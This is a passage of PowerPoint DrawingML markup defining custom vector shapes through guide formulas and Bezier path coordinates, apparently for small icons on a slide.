                <a:gd name="T26" fmla="*/ 30 w 41"/>
                <a:gd name="T27" fmla="*/ 39 h 42"/>
                <a:gd name="T28" fmla="*/ 22 w 41"/>
                <a:gd name="T29" fmla="*/ 29 h 42"/>
                <a:gd name="T30" fmla="*/ 13 w 41"/>
                <a:gd name="T31" fmla="*/ 32 h 42"/>
                <a:gd name="T32" fmla="*/ 2 w 41"/>
                <a:gd name="T33" fmla="*/ 35 h 42"/>
                <a:gd name="T34" fmla="*/ 0 w 41"/>
                <a:gd name="T35" fmla="*/ 31 h 42"/>
                <a:gd name="T36" fmla="*/ 3 w 41"/>
                <a:gd name="T37" fmla="*/ 30 h 42"/>
                <a:gd name="T38" fmla="*/ 17 w 41"/>
                <a:gd name="T39" fmla="*/ 22 h 42"/>
                <a:gd name="T40" fmla="*/ 4 w 41"/>
                <a:gd name="T41" fmla="*/ 20 h 42"/>
                <a:gd name="T42" fmla="*/ 3 w 41"/>
                <a:gd name="T43" fmla="*/ 19 h 42"/>
                <a:gd name="T44" fmla="*/ 5 w 41"/>
                <a:gd name="T45" fmla="*/ 15 h 42"/>
                <a:gd name="T46" fmla="*/ 9 w 41"/>
                <a:gd name="T47" fmla="*/ 17 h 42"/>
                <a:gd name="T48" fmla="*/ 13 w 41"/>
                <a:gd name="T49" fmla="*/ 4 h 42"/>
                <a:gd name="T50" fmla="*/ 16 w 41"/>
                <a:gd name="T51" fmla="*/ 5 h 42"/>
                <a:gd name="T52" fmla="*/ 24 w 41"/>
                <a:gd name="T53" fmla="*/ 2 h 42"/>
                <a:gd name="T54" fmla="*/ 24 w 41"/>
                <a:gd name="T55" fmla="*/ 0 h 42"/>
                <a:gd name="T56" fmla="*/ 26 w 41"/>
                <a:gd name="T57" fmla="*/ 1 h 42"/>
                <a:gd name="T58" fmla="*/ 29 w 41"/>
                <a:gd name="T59" fmla="*/ 2 h 42"/>
                <a:gd name="T60" fmla="*/ 28 w 41"/>
                <a:gd name="T61" fmla="*/ 3 h 42"/>
                <a:gd name="T62" fmla="*/ 35 w 41"/>
                <a:gd name="T63" fmla="*/ 9 h 42"/>
                <a:gd name="T64" fmla="*/ 34 w 41"/>
                <a:gd name="T65" fmla="*/ 13 h 42"/>
                <a:gd name="T66" fmla="*/ 25 w 41"/>
                <a:gd name="T67" fmla="*/ 16 h 42"/>
                <a:gd name="T68" fmla="*/ 32 w 41"/>
                <a:gd name="T69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" h="42">
                  <a:moveTo>
                    <a:pt x="22" y="10"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="8"/>
                    <a:pt x="15" y="8"/>
                    <a:pt x="15" y="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0" y="18"/>
                    <a:pt x="20" y="16"/>
                    <a:pt x="21" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="13"/>
                    <a:pt x="22" y="12"/>
                    <a:pt x="22" y="10"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="35" y="9"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="9"/>
                    <a:pt x="36" y="9"/>
                    <a:pt x="37" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="9"/>
                    <a:pt x="38" y="10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12"/>
                    <a:pt x="37" y="14"/>
                    <a:pt x="37" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="19"/>
                    <a:pt x="36" y="21"/>
                    <a:pt x="36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40" y="24"/>
                    <a:pt x="40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39" y="28"/>
                    <a:pt x="39" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="28"/>
                    <a:pt x="39" y="28"/>
                    <a:pt x="39" y="27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6"/>
                    <a:pt x="26" y="27"/>
                    <a:pt x="27" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="30"/>
                    <a:pt x="28" y="31"/>
                    <a:pt x="28" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="33"/>
                    <a:pt x="30" y="34"/>
                    <a:pt x="32" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="36"/>
                    <a:pt x="35" y="37"/>
                    <a:pt x="36" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="39"/>
                    <a:pt x="38" y="39"/>
                    <a:pt x="38" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="39"/>
                    <a:pt x="38" y="40"/>
                    <a:pt x="38" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="40"/>
                    <a:pt x="36" y="41"/>
                    <a:pt x="34" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="42"/>
                    <a:pt x="32" y="41"/>
                    <a:pt x="30" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="37"/>
                    <a:pt x="25" y="35"/>
                    <a:pt x="24" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="32"/>
                    <a:pt x="23" y="30"/>
                    <a:pt x="22" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="27"/>
                    <a:pt x="21" y="26"/>
                    <a:pt x="21" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="28"/>
                    <a:pt x="16" y="30"/>
                    <a:pt x="13" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="33"/>
                    <a:pt x="8" y="34"/>
                    <a:pt x="5" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="35"/>
                    <a:pt x="2" y="35"/>
                    <a:pt x="2" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="34"/>
                    <a:pt x="1" y="33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0"/>
                    <a:pt x="0" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="31"/>
                    <a:pt x="1" y="30"/>
                    <a:pt x="3" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="30"/>
                    <a:pt x="8" y="29"/>
                    <a:pt x="10" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="27"/>
                    <a:pt x="16" y="25"/>
                    <a:pt x="17" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="22"/>
                    <a:pt x="14" y="21"/>
                    <a:pt x="11" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="21"/>
                    <a:pt x="7" y="20"/>
                    <a:pt x="4" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="20"/>
                    <a:pt x="4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5"/>
                    <a:pt x="4" y="15"/>
                    <a:pt x="5" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="15"/>
                    <a:pt x="5" y="15"/>
                    <a:pt x="5" y="16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3" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="4"/>
                    <a:pt x="14" y="4"/>
                    <a:pt x="15" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="4"/>
                    <a:pt x="16" y="5"/>
                    <a:pt x="16" y="5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1"/>
                    <a:pt x="24" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="1"/>
                    <a:pt x="24" y="0"/>
                    <a:pt x="24" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="0"/>
                    <a:pt x="25" y="0"/>
                    <a:pt x="25" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="1"/>
                    <a:pt x="26" y="1"/>
                    <a:pt x="26" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="1"/>
                    <a:pt x="28" y="1"/>
                    <a:pt x="28" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="1"/>
                    <a:pt x="29" y="2"/>
                    <a:pt x="29" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="2"/>
                    <a:pt x="29" y="2"/>
                    <a:pt x="28" y="2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5" y="9"/>
                    <a:pt x="35" y="9"/>
                    <a:pt x="35" y="9"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="32" y="22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2"/>
                    <a:pt x="25" y="14"/>
                    <a:pt x="25" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="17"/>
                    <a:pt x="24" y="19"/>
                    <a:pt x="23" y="20"/>
                  </a:cubicBez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ṧlíďè"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3872518" y="4083665"/>
              <a:ext cx="113157" cy="118611"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 6 w 35"/>
                <a:gd name="T1" fmla="*/ 12 h 37"/>
                <a:gd name="T2" fmla="*/ 16 w 35"/>
                <a:gd name="T3" fmla="*/ 17 h 37"/>
                <a:gd name="T4" fmla="*/ 16 w 35"/>
                <a:gd name="T5" fmla="*/ 13 h 37"/>
                <a:gd name="T6" fmla="*/ 31 w 35"/>
                <a:gd name="T7" fmla="*/ 1 h 37"/>
                <a:gd name="T8" fmla="*/ 32 w 35"/>
                <a:gd name="T9" fmla="*/ 13 h 37"/>
                <a:gd name="T10" fmla="*/ 28 w 35"/>
                <a:gd name="T11" fmla="*/ 13 h 37"/>
                <a:gd name="T12" fmla="*/ 20 w 35"/>
                <a:gd name="T13" fmla="*/ 13 h 37"/>
                <a:gd name="T14" fmla="*/ 20 w 35"/>
                <a:gd name="T15" fmla="*/ 18 h 37"/>
                <a:gd name="T16" fmla="*/ 32 w 35"/>
                <a:gd name="T17" fmla="*/ 18 h 37"/>
                <a:gd name="T18" fmla="*/ 33 w 35"/>
                <a:gd name="T19" fmla="*/ 18 h 37"/>
                <a:gd name="T20" fmla="*/ 33 w 35"/>
                <a:gd name="T21" fmla="*/ 22 h 37"/>
                <a:gd name="T22" fmla="*/ 20 w 35"/>
                <a:gd name="T23" fmla="*/ 21 h 37"/>
                <a:gd name="T24" fmla="*/ 21 w 35"/>
                <a:gd name="T25" fmla="*/ 24 h 37"/>
                <a:gd name="T26" fmla="*/ 30 w 35"/>
                <a:gd name="T27" fmla="*/ 32 h 37"/>
                <a:gd name="T28" fmla="*/ 31 w 35"/>
                <a:gd name="T29" fmla="*/ 28 h 37"/>
                <a:gd name="T30" fmla="*/ 33 w 35"/>
                <a:gd name="T31" fmla="*/ 29 h 37"/>
                <a:gd name="T32" fmla="*/ 35 w 35"/>
                <a:gd name="T33" fmla="*/ 30 h 37"/>
                <a:gd name="T34" fmla="*/ 31 w 35"/>
                <a:gd name="T35" fmla="*/ 37 h 37"/>
                <a:gd name="T36" fmla="*/ 22 w 35"/>
                <a:gd name="T37" fmla="*/ 32 h 37"/>
                <a:gd name="T38" fmla="*/ 17 w 35"/>
                <a:gd name="T39" fmla="*/ 21 h 37"/>
                <a:gd name="T40" fmla="*/ 5 w 35"/>
                <a:gd name="T41" fmla="*/ 31 h 37"/>
                <a:gd name="T42" fmla="*/ 17 w 35"/>
                <a:gd name="T43" fmla="*/ 29 h 37"/>
                <a:gd name="T44" fmla="*/ 18 w 35"/>
                <a:gd name="T45" fmla="*/ 29 h 37"/>
                <a:gd name="T46" fmla="*/ 17 w 35"/>
                <a:gd name="T47" fmla="*/ 33 h 37"/>
                <a:gd name="T48" fmla="*/ 3 w 35"/>
                <a:gd name="T49" fmla="*/ 36 h 37"/>
                <a:gd name="T50" fmla="*/ 2 w 35"/>
                <a:gd name="T51" fmla="*/ 36 h 37"/>
                <a:gd name="T52" fmla="*/ 0 w 35"/>
                <a:gd name="T53" fmla="*/ 32 h 37"/>
                <a:gd name="T54" fmla="*/ 1 w 35"/>
                <a:gd name="T55" fmla="*/ 25 h 37"/>
                <a:gd name="T56" fmla="*/ 2 w 35"/>
                <a:gd name="T57" fmla="*/ 2 h 37"/>
                <a:gd name="T58" fmla="*/ 2 w 35"/>
                <a:gd name="T59" fmla="*/ 0 h 37"/>
                <a:gd name="T60" fmla="*/ 4 w 35"/>
                <a:gd name="T61" fmla="*/ 0 h 37"/>
                <a:gd name="T62" fmla="*/ 28 w 35"/>
                <a:gd name="T63" fmla="*/ 9 h 37"/>
                <a:gd name="T64" fmla="*/ 6 w 35"/>
                <a:gd name="T65" fmla="*/ 4 h 37"/>
                <a:gd name="T66" fmla="*/ 28 w 35"/>
                <a:gd name="T67" fmla="*/ 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37">
                  <a:moveTo>
                    <a:pt x="16" y="13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6"/>
                    <a:pt x="16" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="14"/>
                    <a:pt x="16" y="13"/>
                    <a:pt x="16" y="13"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="29" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="1"/>
                    <a:pt x="31" y="1"/>
                    <a:pt x="31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8"/>
                    <a:pt x="32" y="12"/>
                    <a:pt x="32" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="13"/>
                    <a:pt x="31" y="13"/>
                    <a:pt x="31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4"/>
                    <a:pt x="20" y="14"/>
                    <a:pt x="20" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="16"/>
                    <a:pt x="20" y="17"/>
                    <a:pt x="20" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="18"/>
                    <a:pt x="23" y="18"/>
                    <a:pt x="24" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="18"/>
                    <a:pt x="32" y="18"/>
                    <a:pt x="32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2" y="22"/>
                    <a:pt x="32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1" y="22"/>
                    <a:pt x="21" y="22"/>
                    <a:pt x="21" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="23"/>
                    <a:pt x="21" y="24"/>
                    <a:pt x="21" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="26"/>
                    <a:pt x="23" y="28"/>
                    <a:pt x="25" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="32"/>
                    <a:pt x="29" y="32"/>
                    <a:pt x="30" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="32"/>
                    <a:pt x="31" y="31"/>
                    <a:pt x="31" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="29"/>
                    <a:pt x="31" y="29"/>
                    <a:pt x="31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2" y="28"/>
                    <a:pt x="33" y="29"/>
                    <a:pt x="33" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="29"/>
                    <a:pt x="34" y="29"/>
                    <a:pt x="35" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="29"/>
                    <a:pt x="35" y="30"/>
                    <a:pt x="35" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="31"/>
                    <a:pt x="35" y="32"/>
                    <a:pt x="34" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="36"/>
                    <a:pt x="32" y="37"/>
                    <a:pt x="31" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="37"/>
                    <a:pt x="29" y="37"/>
                    <a:pt x="28" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="35"/>
                    <a:pt x="23" y="34"/>
                    <a:pt x="22" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="30"/>
                    <a:pt x="18" y="28"/>
                    <a:pt x="17" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="24"/>
                    <a:pt x="17" y="22"/>
                    <a:pt x="17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4" y="30"/>
                    <a:pt x="17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3"/>
                    <a:pt x="18" y="33"/>
                    <a:pt x="17" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="33"/>
                    <a:pt x="13" y="34"/>
                    <a:pt x="11" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="35"/>
                    <a:pt x="6" y="35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2" y="36"/>
                    <a:pt x="2" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="36"/>
                    <a:pt x="1" y="36"/>
                    <a:pt x="1" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="33"/>
                    <a:pt x="0" y="32"/>
                    <a:pt x="0" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="32"/>
                    <a:pt x="1" y="31"/>
                    <a:pt x="1" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="29"/>
                    <a:pt x="1" y="27"/>
                    <a:pt x="1" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="22"/>
                    <a:pt x="1" y="19"/>
                    <a:pt x="1" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="11"/>
                    <a:pt x="2" y="6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29" y="1"/>
                    <a:pt x="29" y="1"/>
                    <a:pt x="29" y="1"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="28" y="9"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="5"/>
                    <a:pt x="28" y="5"/>
                    <a:pt x="28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8"/>
                    <a:pt x="6" y="8"/>
                    <a:pt x="6" y="8"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2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ṣḷiḋè"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4011579" y="4076849"/>
              <a:ext cx="134971" cy="125427"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 42"/>
                <a:gd name="T1" fmla="*/ 11 h 39"/>
                <a:gd name="T2" fmla="*/ 1 w 42"/>
                <a:gd name="T3" fmla="*/ 7 h 39"/>
                <a:gd name="T4" fmla="*/ 9 w 42"/>
                <a:gd name="T5" fmla="*/ 7 h 39"/>
                <a:gd name="T6" fmla="*/ 17 w 42"/>
                <a:gd name="T7" fmla="*/ 6 h 39"/>
                <a:gd name="T8" fmla="*/ 17 w 42"/>
                <a:gd name="T9" fmla="*/ 10 h 39"/>
                <a:gd name="T10" fmla="*/ 9 w 42"/>
                <a:gd name="T11" fmla="*/ 10 h 39"/>
                <a:gd name="T12" fmla="*/ 9 w 42"/>
                <a:gd name="T13" fmla="*/ 15 h 39"/>
                <a:gd name="T14" fmla="*/ 16 w 42"/>
                <a:gd name="T15" fmla="*/ 16 h 39"/>
                <a:gd name="T16" fmla="*/ 14 w 42"/>
                <a:gd name="T17" fmla="*/ 37 h 39"/>
                <a:gd name="T18" fmla="*/ 9 w 42"/>
                <a:gd name="T19" fmla="*/ 36 h 39"/>
                <a:gd name="T20" fmla="*/ 9 w 42"/>
                <a:gd name="T21" fmla="*/ 35 h 39"/>
                <a:gd name="T22" fmla="*/ 12 w 42"/>
                <a:gd name="T23" fmla="*/ 34 h 39"/>
                <a:gd name="T24" fmla="*/ 13 w 42"/>
                <a:gd name="T25" fmla="*/ 18 h 39"/>
                <a:gd name="T26" fmla="*/ 9 w 42"/>
                <a:gd name="T27" fmla="*/ 25 h 39"/>
                <a:gd name="T28" fmla="*/ 7 w 42"/>
                <a:gd name="T29" fmla="*/ 39 h 39"/>
                <a:gd name="T30" fmla="*/ 4 w 42"/>
                <a:gd name="T31" fmla="*/ 35 h 39"/>
                <a:gd name="T32" fmla="*/ 5 w 42"/>
                <a:gd name="T33" fmla="*/ 19 h 39"/>
                <a:gd name="T34" fmla="*/ 10 w 42"/>
                <a:gd name="T35" fmla="*/ 3 h 39"/>
                <a:gd name="T36" fmla="*/ 6 w 42"/>
                <a:gd name="T37" fmla="*/ 0 h 39"/>
                <a:gd name="T38" fmla="*/ 7 w 42"/>
                <a:gd name="T39" fmla="*/ 6 h 39"/>
                <a:gd name="T40" fmla="*/ 11 w 42"/>
                <a:gd name="T41" fmla="*/ 5 h 39"/>
                <a:gd name="T42" fmla="*/ 33 w 42"/>
                <a:gd name="T43" fmla="*/ 13 h 39"/>
                <a:gd name="T44" fmla="*/ 37 w 42"/>
                <a:gd name="T45" fmla="*/ 13 h 39"/>
                <a:gd name="T46" fmla="*/ 37 w 42"/>
                <a:gd name="T47" fmla="*/ 16 h 39"/>
                <a:gd name="T48" fmla="*/ 32 w 42"/>
                <a:gd name="T49" fmla="*/ 17 h 39"/>
                <a:gd name="T50" fmla="*/ 36 w 42"/>
                <a:gd name="T51" fmla="*/ 21 h 39"/>
                <a:gd name="T52" fmla="*/ 40 w 42"/>
                <a:gd name="T53" fmla="*/ 21 h 39"/>
                <a:gd name="T54" fmla="*/ 40 w 42"/>
                <a:gd name="T55" fmla="*/ 25 h 39"/>
                <a:gd name="T56" fmla="*/ 34 w 42"/>
                <a:gd name="T57" fmla="*/ 27 h 39"/>
                <a:gd name="T58" fmla="*/ 41 w 42"/>
                <a:gd name="T59" fmla="*/ 33 h 39"/>
                <a:gd name="T60" fmla="*/ 40 w 42"/>
                <a:gd name="T61" fmla="*/ 36 h 39"/>
                <a:gd name="T62" fmla="*/ 33 w 42"/>
                <a:gd name="T63" fmla="*/ 31 h 39"/>
                <a:gd name="T64" fmla="*/ 24 w 42"/>
                <a:gd name="T65" fmla="*/ 37 h 39"/>
                <a:gd name="T66" fmla="*/ 19 w 42"/>
                <a:gd name="T67" fmla="*/ 35 h 39"/>
                <a:gd name="T68" fmla="*/ 27 w 42"/>
                <a:gd name="T69" fmla="*/ 28 h 39"/>
                <a:gd name="T70" fmla="*/ 24 w 42"/>
                <a:gd name="T71" fmla="*/ 26 h 39"/>
                <a:gd name="T72" fmla="*/ 20 w 42"/>
                <a:gd name="T73" fmla="*/ 26 h 39"/>
                <a:gd name="T74" fmla="*/ 20 w 42"/>
                <a:gd name="T75" fmla="*/ 22 h 39"/>
                <a:gd name="T76" fmla="*/ 28 w 42"/>
                <a:gd name="T77" fmla="*/ 20 h 39"/>
                <a:gd name="T78" fmla="*/ 26 w 42"/>
                <a:gd name="T79" fmla="*/ 17 h 39"/>
                <a:gd name="T80" fmla="*/ 21 w 42"/>
                <a:gd name="T81" fmla="*/ 20 h 39"/>
                <a:gd name="T82" fmla="*/ 23 w 42"/>
                <a:gd name="T83" fmla="*/ 15 h 39"/>
                <a:gd name="T84" fmla="*/ 24 w 42"/>
                <a:gd name="T85" fmla="*/ 10 h 39"/>
                <a:gd name="T86" fmla="*/ 28 w 42"/>
                <a:gd name="T87" fmla="*/ 12 h 39"/>
                <a:gd name="T88" fmla="*/ 24 w 42"/>
                <a:gd name="T89" fmla="*/ 4 h 39"/>
                <a:gd name="T90" fmla="*/ 24 w 42"/>
                <a:gd name="T91" fmla="*/ 1 h 39"/>
                <a:gd name="T92" fmla="*/ 20 w 42"/>
                <a:gd name="T93" fmla="*/ 0 h 39"/>
                <a:gd name="T94" fmla="*/ 19 w 42"/>
                <a:gd name="T95" fmla="*/ 8 h 39"/>
                <a:gd name="T96" fmla="*/ 17 w 42"/>
                <a:gd name="T97" fmla="*/ 14 h 39"/>
                <a:gd name="T98" fmla="*/ 23 w 42"/>
                <a:gd name="T99" fmla="*/ 9 h 39"/>
                <a:gd name="T100" fmla="*/ 30 w 42"/>
                <a:gd name="T101" fmla="*/ 7 h 39"/>
                <a:gd name="T102" fmla="*/ 38 w 42"/>
                <a:gd name="T103" fmla="*/ 7 h 39"/>
                <a:gd name="T104" fmla="*/ 38 w 42"/>
                <a:gd name="T105" fmla="*/ 3 h 39"/>
                <a:gd name="T106" fmla="*/ 30 w 42"/>
                <a:gd name="T107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39">
                  <a:moveTo>
                    <a:pt x="4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3" y="7"/>
                    <a:pt x="5" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="7"/>
                    <a:pt x="8" y="7"/>
                    <a:pt x="9" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="6"/>
                    <a:pt x="11" y="6"/>
                    <a:pt x="13" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="6"/>
                    <a:pt x="15" y="6"/>
                    <a:pt x="16" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16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6" y="10"/>
                    <a:pt x="16" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="10"/>
                    <a:pt x="14" y="10"/>
                    <a:pt x="12" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="10"/>
                    <a:pt x="9" y="10"/>
                    <a:pt x="9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1"/>
                    <a:pt x="8" y="12"/>
                    <a:pt x="8" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="13"/>
                    <a:pt x="9" y="14"/>
                    <a:pt x="9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5"/>
                    <a:pt x="16" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="19"/>
                    <a:pt x="17" y="22"/>
                    <a:pt x="17" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="31"/>
                    <a:pt x="17" y="33"/>
                    <a:pt x="17" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="36"/>
                    <a:pt x="16" y="37"/>
                    <a:pt x="14" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="38"/>
                    <a:pt x="12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8"/>
                    <a:pt x="9" y="37"/>
                    <a:pt x="9" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="36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2" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="34"/>
                    <a:pt x="13" y="34"/>
                    <a:pt x="13" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="32"/>
                    <a:pt x="13" y="29"/>
                    <a:pt x="13" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="23"/>
                    <a:pt x="13" y="20"/>
                    <a:pt x="13" y="18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9" y="23"/>
                    <a:pt x="9" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="28"/>
                    <a:pt x="9" y="31"/>
                    <a:pt x="9" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="35"/>
                    <a:pt x="8" y="36"/>
                    <a:pt x="7" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="38"/>
                    <a:pt x="7" y="38"/>
                    <a:pt x="7" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="38"/>
                    <a:pt x="5" y="38"/>
                    <a:pt x="4" y="38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6"/>
                    <a:pt x="4" y="36"/>
                    <a:pt x="4" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="34"/>
                    <a:pt x="4" y="33"/>
                    <a:pt x="5" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="30"/>
                    <a:pt x="5" y="28"/>
                    <a:pt x="5" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="24"/>
                    <a:pt x="5" y="22"/>
                    <a:pt x="5" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="11"/>
                    <a:pt x="4" y="11"/>
                    <a:pt x="4" y="11"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="11" y="5"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="5"/>
                    <a:pt x="11" y="5"/>
                    <a:pt x="10" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="2"/>
                    <a:pt x="9" y="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2"/>
                    <a:pt x="6" y="4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0" y="6"/>
                    <a:pt x="11" y="6"/>
                    <a:pt x="11" y="5"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="27" y="13"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="13"/>
                    <a:pt x="30" y="13"/>
                    <a:pt x="30" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
